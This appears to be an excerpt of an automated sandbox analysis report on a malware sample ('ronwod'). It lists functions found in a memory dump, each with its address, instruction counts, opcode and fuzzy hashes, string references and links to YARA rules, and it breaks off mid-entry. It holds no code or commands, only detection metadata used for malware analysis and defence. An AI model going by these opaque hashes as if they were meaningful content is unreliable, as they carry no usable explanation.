API String ID: 0-3646680613
Opcode ID: f88068210bd2dc2999acbca524d81140481d48d60ae2e4eae94106a61e3136ea
Instruction ID: de7646105f69304d79e42cd0801813fa1cd62724e395e44ee24abd538e7284da
Opcode Fuzzy Hash: f88068210bd2dc2999acbca524d81140481d48d60ae2e4eae94106a61e3136ea
Instruction Fuzzy Hash: F141C1705042109BC7389F28C8956B7B3B6FFA6354F055A1CE8CAAF3A2EB355941C792

Function 00EBB48C Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

EVJ_, xrefs: 00EBB52B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: EVJ_
API String ID: 0-352177915
Opcode ID: 6bc179afbda5d99e9503ff3b11db987c4a5631925028ccb513db4afdd25f54da
Instruction ID: 92939658a04aa5bbf169f846ace1cc0344ea92d90d447fad0c377a86ffc44d60
Opcode Fuzzy Hash: 6bc179afbda5d99e9503ff3b11db987c4a5631925028ccb513db4afdd25f54da
Instruction Fuzzy Hash: AC51243150A3914EE725CF29C4547EBFBE2AFE7304F28D4ADC4C967291DB7548068752

Function 00EBB841 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

Nv, xrefs: 00EBB8EF

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Nv
API String ID: 0-2521146493
Opcode ID: 320c19e32cbc90a711d2a1ef85314a673dd442230d78fd8bad4473f360adf48a
Instruction ID: 5c1cd6b43e0a8540f2c0074d123cdce6947e4a168c664a1d5d6620cac808de62
Opcode Fuzzy Hash: 320c19e32cbc90a711d2a1ef85314a673dd442230d78fd8bad4473f360adf48a
Instruction Fuzzy Hash: B551F4755083818BE339CB25C8507FBB7E1EFD6304F58986DC4CAE7250EB7448058B52

Function 00ECFF00 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 00ECFFCA

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: d033a3811c5e86f16e415441e5f40c8e4e7b33c77f6d56653edd11b5f9bfa23c
Instruction ID: 1e9671d4a0a1179114360c12225d31fdfe13b1b880ce07e3a36201e699396552
Opcode Fuzzy Hash: d033a3811c5e86f16e415441e5f40c8e4e7b33c77f6d56653edd11b5f9bfa23c
Instruction Fuzzy Hash: 4F412572A053009BC7148F14CC55B6BBBE2FFC5328F19992CE5D92B3A1E7759816C782

Function 00EB904E Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

Dkpk, xrefs: 00EB90A0, 00EB916B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Dkpk
API String ID: 0-2230318481
Opcode ID: 1520fa21216ff619215a71b3968dfcb2f33137fee1b674c6d779f40501293f40
Instruction ID: c52c4c7b222fbc5899233c54c83c1e7a3eaa989f95c547d0f3bbaa085499a6d8
Opcode Fuzzy Hash: 1520fa21216ff619215a71b3968dfcb2f33137fee1b674c6d779f40501293f40
Instruction Fuzzy Hash: 6831D1766083018BC7109F59C8526ABB3F2FFC6350F059928E6D1AB361E738D940D756

Function 00ED0400 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

yJ, xrefs: 00ED040C

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: yJ
API String ID: 2994545307-2994349857
Opcode ID: 98bd8f4a6a7816bd7a4e89aaed98dd8e970966d93744311e086c62b09a90dc88
Instruction ID: 3db541ecc1543e6c14649945d2680d9badbe4a1435745c6332c7d8b29c0fdd42
Opcode Fuzzy Hash: 98bd8f4a6a7816bd7a4e89aaed98dd8e970966d93744311e086c62b09a90dc88
Instruction Fuzzy Hash: 87218B797112005FC7148F14DC80FBEB7A6FBC4328F18A52EDAA0A7366D6319816C351

Function 00E9C08B Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

|X|X, xrefs: 00E9C0EF

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: |X|X
API String ID: 0-2218283020
Opcode ID: 4a7db613018c81521ec66125f418842b065008c3e2085537000f770ae7096544
Instruction ID: 530106abf757d1f5aea661ba3b1d3988e664e5f90823eae282a77dc2ac451298
Opcode Fuzzy Hash: 4a7db613018c81521ec66125f418842b065008c3e2085537000f770ae7096544
Instruction Fuzzy Hash: B72190BAE006228FC725CF58CC95BAAB3B0FF59700F025229ED49BB760D635AC5187D4

Function 00E9C158 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

|X|X, xrefs: 00E9C1BF

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: |X|X
API String ID: 0-2218283020
Opcode ID: 595ef52c64d858baf46463bae03b177f69bbdbd87f747262845a5899b6f1ec82
Instruction ID: 8aad5b44b69fc37bf98ad877e4476d1b2dbbfe1d90ab14d8cbc631350500a4e1
Opcode Fuzzy Hash: 595ef52c64d858baf46463bae03b177f69bbdbd87f747262845a5899b6f1ec82
Instruction Fuzzy Hash: 72119DBAE006229FCB21CF68CC41BAAF3B1BF49700F125215E959FB361D671ED528794

Function 00E92ED0 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463b5f582ce1169dcae78d640f6a899f35f8631c21175a93c6aee882e66311b6
Instruction ID: 32eeea837bff7a93794740609fd6e2e2c5afae376be6ffb7ae38575a634ef242
Opcode Fuzzy Hash: 463b5f582ce1169dcae78d640f6a899f35f8631c21175a93c6aee882e66311b6
Instruction Fuzzy Hash: 9652F5715083459FCB15CF28C0906EABBE1FF88308F199A6EF8996B351D774DA49CB81

Function 00E96640 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 645b23f7753a88f989fad9f0602d47943bbf47be34f5a9b3e7f9edd1e840078c
Instruction ID: cf6afea2e4dac6bddaf5580216aa351a846dad7b323bf83fecf7ad10f6432d3a
Opcode Fuzzy Hash: 645b23f7753a88f989fad9f0602d47943bbf47be34f5a9b3e7f9edd1e840078c
Instruction Fuzzy Hash: 1852E970A08B848FEF35CB24C4843A7BBE1EB51318F14A96FD5E716782D379A985C711

Function 00E97410 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction ID: d3e461a4532dbd324d15e918ad9c2df782c41244467fbddc323f6e9b74d8dfdc
Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction Fuzzy Hash: 2B22D431A1C7118BCB25DF18D8806ABB3E2FFC4319F19992DD9C6A7285E734A855CB42

Function 00E938F0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d659ea09f007d1f783b345049b95ad5ef59bda9cbff22749b0d8d354abde08
Instruction ID: 3c274775f62d1737d53846fde4d98d4315566b3c6abaa9279a3b33d9573fa188
Opcode Fuzzy Hash: 73d659ea09f007d1f783b345049b95ad5ef59bda9cbff22749b0d8d354abde08
Instruction Fuzzy Hash: F6322370A14B108FCB38CF29C59056ABBF1FF85310B605A2ED6A7A7A90D336F945CB10

Function 00EA6777 Relevance: .5, Instructions: 533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe0afa41cff5637e018734c63427085dadc9521ff51b2ebf46cae10ba1362028
Instruction ID: adce23d8aa21bfab9a7ed97a25e3f65740843bc180a8496422213154de16109d
Opcode Fuzzy Hash: fe0afa41cff5637e018734c63427085dadc9521ff51b2ebf46cae10ba1362028
Instruction Fuzzy Hash: 22E168729187108FD328CF28C89037BB7E2EFD6314F1D592DD4E2AB291D675A845CB91

Function 00EC86C0 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e4a01d191e5b195583590e81509f7a4d64c4dc210a2751521bc0cbacdc4766
Instruction ID: 303213f6d4084ba58b7e373b92028d9c051f895e4ca9db804c39ae55aacaaf9a
Opcode Fuzzy Hash: b0e4a01d191e5b195583590e81509f7a4d64c4dc210a2751521bc0cbacdc4766
Instruction Fuzzy Hash: A5E13372A043119FD714DE25DB80B6BB7E2FFC4308F19A52CE98877291DB729C068792

Function 00EAB729 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3546283fb62b27dd70fb350920a5e82aa6d5aaac84b5a5965c031c256a52f4f0
Instruction ID: b8f109213cf5cc4158c631695786132182b169df18ff6df28f0e2e65573560bb
Opcode Fuzzy Hash: 3546283fb62b27dd70fb350920a5e82aa6d5aaac84b5a5965c031c256a52f4f0
Instruction Fuzzy Hash: 6DE10175600601CBC728CF29C491672B7F2FF9B314719A69DE486AF7A6E734E841CB60

Function 00EB5A90 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9552062ce5697e89aeeb1688aee84e8af18a6b0aa1a8cf654af49bc4af0ffb2
Instruction ID: f3813607ff22d5e83660d3dd8ab4c552109aca476d2d6e8fe182569326456739
Opcode Fuzzy Hash: d9552062ce5697e89aeeb1688aee84e8af18a6b0aa1a8cf654af49bc4af0ffb2
Instruction Fuzzy Hash: 19E13171608304CFD720DF65E891BABB7E1FBA5308F40992EF589AB2A1D774D805CB42

Function 00E95930 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9827aaea15cf7a832fb6e9205595bc42e41cb49d1e93da80b2c9735a134d7c
Instruction ID: d4b33489ebf92f8c21107962c6f87f6dabd4c0e5741fb2d584e00a1e61651a07
Opcode Fuzzy Hash: ec9827aaea15cf7a832fb6e9205595bc42e41cb49d1e93da80b2c9735a134d7c
Instruction Fuzzy Hash: 48E168722087418FDB21DF29C880A6BFBE1EF98304F449C2DE5D597752E275E948CB92

Function 00EC8FD9 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bcbc1fd91a5143edb9cbc9a176947f1618c93da5dfc60e9eb8fc16701c956d7
Instruction ID: c046a265ac8f6a7ca9e63aae86a35473afda10335991f18d4a2e26b3521c2378
Opcode Fuzzy Hash: 4bcbc1fd91a5143edb9cbc9a176947f1618c93da5dfc60e9eb8fc16701c956d7
Instruction Fuzzy Hash: FAD1023A629212CFCB189F25EE5127A73F1FF85B45F0AC46EC4456B2A0EB368D55C701

Function 00EB2140 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69c17370234a618b1a56021043587f419f52941e5817bcb8484b9fb5fdc69700
Instruction ID: 661b3818f92ff8fde8212c9b993cdf8838b733e6c2150351828b30967210f82f
Opcode Fuzzy Hash: 69c17370234a618b1a56021043587f419f52941e5817bcb8484b9fb5fdc69700
Instruction Fuzzy Hash: 3BA1F2716043119BD7209F18C8927ABB3E5FF91318F19A52CEA99BB291E334ED458392

Function 00EB5ACF Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34fc5b0606a475215dba8bf1c0fa945f6c66fbe4f4c9369232c8b2640ed86908
Instruction ID: abecb06c6e921697f118e9af90ad5eece42432a2b53d451a4f2bcddddd476826
Opcode Fuzzy Hash: 34fc5b0606a475215dba8bf1c0fa945f6c66fbe4f4c9369232c8b2640ed86908
Instruction Fuzzy Hash: F4A176315493558FDB248E58C4411FBBBE0EF55340F58A93DE8C6AB391E338E905E791

Function 00ECF780 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe4329fec931496cb55701bbc637b3cb0b9cb8c93e50efde9e8484ebb4fc0f01
Instruction ID: ffbc34d2994edfc3ffb8c40837d4780cc75a4b63c2c8b414e34c9af948095c42
Opcode Fuzzy Hash: fe4329fec931496cb55701bbc637b3cb0b9cb8c93e50efde9e8484ebb4fc0f01
Instruction Fuzzy Hash: F8A1B3356047219BCB28DF18C990A6AB7E3FF88314F15953CE999AB361D772EC12C781

Function 00EADDC0 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe4d80c48f6dba5a88e2eed03e5784490fe4a9b2a23a37fe4ebed52d4107370
Instruction ID: a0f7a9780f1b60f6431d2e788f310d1d042655ca87444d4800aa61bf6fa46c04
Opcode Fuzzy Hash: dbe4d80c48f6dba5a88e2eed03e5784490fe4a9b2a23a37fe4ebed52d4107370
Instruction Fuzzy Hash: 75A1293371AA910BC71C9D7C4C512A9BA834BEB330B2DD33EA5B69F3E5D9655C054340

Function 00ECF450 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d8f78b50e96d9bd58fde864a461b263130401a5158f3d373679978e1106b8a10
Instruction ID: 76aa96bea4731ec4bd0512418ed8580c2cde83d814be62608279d600ab688125
Opcode Fuzzy Hash: d8f78b50e96d9bd58fde864a461b263130401a5158f3d373679978e1106b8a10
Instruction Fuzzy Hash: 5C91C1392043119FC728DF18CA90E6AB3E2FF88714F15952DE995AB361EB32DC12C781

Function 00E961B0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction ID: 50dc04b76b5b21b3b7944ca1af989c4969b9341f46eeca39a0ce2898db2d8e16
Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction Fuzzy Hash: 4DC169B2A487418FC760CF68CC86BABB7F1BF85318F08492DD1D9D6242E778A155CB06

Function 00E9B262 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b9509f1009959b1254cd07bb95dadcc1f3d819a01ea7360cf73be779beadaf
Instruction ID: c78e2c0590868c3de5c4451bd9eb65ae96922f3c8b3de05ed0c4c6cab7c8b3b1
Opcode Fuzzy Hash: f1b9509f1009959b1254cd07bb95dadcc1f3d819a01ea7360cf73be779beadaf
Instruction Fuzzy Hash: 2AA168B2212B01DFC7248F26EC45B67B3F5FB89314F05492DE4ABA76A1D730E8198B50

Function 00EBF5D9 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ec291f1f91463481ac4f8a2379f321472f4b3cb218742a2f4ee806dcc33cb5
Instruction ID: 89d2c02eae39584d074f616f6752521d1b99c68dc0e8688bb31e322586b23b64
Opcode Fuzzy Hash: b7ec291f1f91463481ac4f8a2379f321472f4b3cb218742a2f4ee806dcc33cb5
Instruction Fuzzy Hash: BAB10772604B408BD328DF38D8512A7BBE2AFD5310F198A3CD4DB87795E678A549C742

Function 00EBBD77 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a8b657058e9127c53ab39335cc3107a9e3627ca943e8dd4cc63738b4de26c1
Instruction ID: c9af54cee5d791d4db377c19b1c778f8c3bc0c4d7a9f90fbb9b4a8a2a69c08c2
Opcode Fuzzy Hash: 85a8b657058e9127c53ab39335cc3107a9e3627ca943e8dd4cc63738b4de26c1
Instruction Fuzzy Hash: BC712A72A0C3518BD3188F2988613BBBBD1DFD2704F28D96DE4D6AB391D7798805DB42

Function 00EBBE3B Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45b98361dab2ce658798315e02319a4ca964b7493c3eea582085b42d2b3ee1c
Instruction ID: bc59be5b1e8e2357101b6e64fcf3b04c556d82629187ef82621ed1982dbb3cfd
Opcode Fuzzy Hash: f45b98361dab2ce658798315e02319a4ca964b7493c3eea582085b42d2b3ee1c
Instruction Fuzzy Hash: 13713871A1C3518BD3188F39C8613BBBBE1DFD2704F28D96DE4D6AB391D67988058B42

Function 00EBBE9D Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cff67934e92260a1637ad85a22496e07422303d045c097c348450ae2af85951
Instruction ID: b39771fde64a549a6714363ecdd9e6cf7cbb89b553f14327c4f16d8106f4af69
Opcode Fuzzy Hash: 9cff67934e92260a1637ad85a22496e07422303d045c097c348450ae2af85951
Instruction Fuzzy Hash: BD613A7261C3518BD3188F39C8613BBBBD1DFD2708F28986DE4D6AB391D67988458B42

Function 00EAC119 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b78d38a381322e81a6fee44e7a9754c92c0bb806c144897f1626a6ca118ce50
Instruction ID: 8bff20e7b3fa61f9253e993e19a8d69d96a517d6acbb4b7f666d7a7ac00b014c
Opcode Fuzzy Hash: 1b78d38a381322e81a6fee44e7a9754c92c0bb806c144897f1626a6ca118ce50
Instruction Fuzzy Hash: C681C1B0910B009FC324EF39C942122BBF1FF5A300B549A5EE8D65B795E335A459CBD6

Function 00EA717B Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10a64fcc1d2c910a31400d89e9d59d2acafccc1b1550e9bbc028d36f4385f140
Instruction ID: 5850f6ffd25f3c452d45241563bfed7a546d4d94ff08bdc205020e51754870f8
Opcode Fuzzy Hash: 10a64fcc1d2c910a31400d89e9d59d2acafccc1b1550e9bbc028d36f4385f140
Instruction Fuzzy Hash: 2B71E3752183019FD724CF28DC8076AB7E2BF9D314F16542DE8CAEB262D771AC518791

Function 00EBBE86 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a0ca2d808f3fa821199e02b2cd8bbeadab908a5243edd5992dbb5f02407b42
Instruction ID: cebfeb4ba472ced6db14d0d24f313424f1906cefd6adca1bfc61afc957efcd2e
Opcode Fuzzy Hash: 35a0ca2d808f3fa821199e02b2cd8bbeadab908a5243edd5992dbb5f02407b42
Instruction Fuzzy Hash: 58513B7291C3918BD3188F39C8613B7BBE1DFD2704F28986DE4D5AB391E2798845CB52

Function 00EC0470 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4e9d523b9792c81c8ccae9b36407134338be6d83d5f0b8aac58b4d25f30a03
Instruction ID: 401ee76e954d45acf401c3abf095c63389c4c085a2437e6d341ce67f86d283a1
Opcode Fuzzy Hash: 2b4e9d523b9792c81c8ccae9b36407134338be6d83d5f0b8aac58b4d25f30a03
Instruction Fuzzy Hash: C0716B2674A6D18BC71C593C9D213FABA834FD6334F2D932EE6F29B7E1C91648168340

Function 00ECB650 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99323135655ac92c19da2a9ce2cdf9885eec89339a1d90d70f7a1bc5df655eb6
Instruction ID: ed9745ef9a25fd25976c1a271f727cb656405e95f44a2e2ce3f9723560dff470
Opcode Fuzzy Hash: 99323135655ac92c19da2a9ce2cdf9885eec89339a1d90d70f7a1bc5df655eb6
Instruction Fuzzy Hash: 495106329043109FCB249F29DA81A6BB3A9FFC4718F165A2DD894BB261D7339C16C7C1

Function 00EBDEF1 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b05c23087ceb7c4cd3d1ce26394edcfdd5362c9f83bc25c51d52a6a729d1f55
Instruction ID: 3b04ec5a495416fbfac1253399453855f8bd7ee3a2129875431229be210006f0
Opcode Fuzzy Hash: 2b05c23087ceb7c4cd3d1ce26394edcfdd5362c9f83bc25c51d52a6a729d1f55
Instruction Fuzzy Hash: 5A81F572B15B404BC3289F3CD8922ABBBE2AFD4314F19993DD4EACB395E974A405C705

Function 00EA138A Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d006d78b9628c0ac8835ca32d828d10cd6ec3d97d58957cdaa10736f51c4f9
Instruction ID: 999dfcf2b92c70677c8d7362b5da041ce58d14fede652483d5af10ef550bf1e2
Opcode Fuzzy Hash: 50d006d78b9628c0ac8835ca32d828d10cd6ec3d97d58957cdaa10736f51c4f9
Instruction Fuzzy Hash: 5E81A572A187418BC7189F38C5513AEB7E1AFC9320F155B2EF5EAD72D1EA3499008742

Function 00EAADD0 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b619af3f94dd6cf09828fd9a885fdef36e154f3bbe57ce9ddd71a20d344d06f
